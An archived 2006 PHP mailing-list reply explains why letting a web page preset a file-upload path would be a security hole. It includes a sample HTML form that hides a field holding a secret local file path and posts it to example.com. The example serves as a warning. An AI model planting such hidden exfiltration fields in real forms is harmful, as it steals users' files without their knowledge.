|
|
Posted by "Richard Lynch" on 01/19/06 00:31
On Wed, January 18, 2006 1:21 pm, Jay Blanchard wrote:
> [snip]
>>Does anyone know what the best way to list a directory dialog box or
>>directory drop down list in
>>Php?
Files on the desktop, or up on the server?
>> The script I'm writing has a form that asks the user where his
>>files are and I don't want the
>>user to have to remember the whole directory path in order to type
>> it.
>>
>>Sean
>>
>>
>>
> u can also use <input name="myfile" type="file"> this will open the
> Explorer dialog box for select files.
> [/snip]
>
> Along these same lines, does anyone know how to make the file dialog
> start
> in a specific directory? I saw this the other day but forgot where. I
> clicked browse and the dialog popped up pointed to My Pictures (which
> at
> least works for most Windblows users). I meant to look at the code,
> but
> didn't....
Yikes!
If it *DOES* work, you've probably got yet another security problem in
Windows.
Suppose, for example, that I do something like this:
<form action="http://example.com/" method="post"
enctype="multipart/form-data">
<input style="visibility: hidden" name="steal"
value="C:\path\to\commonly\used\secret\file\I\should\not\get.secret">
What's your name? <input name="name"><br />
Who's your daddy? <input name="daddy"><br />
<input type="submit">
</form>
Now, the unsuspecting user will be HANDING me the file I shouldn't
have without ever seeing anything about it.
Even if it "only" lets you pick the directory, but not the file, it
probably exposes too much information about my desktop for my tastes.
--
Like Music?
http://l-i-e.com/artists.htm
Navigation:
[Reply to this message]
|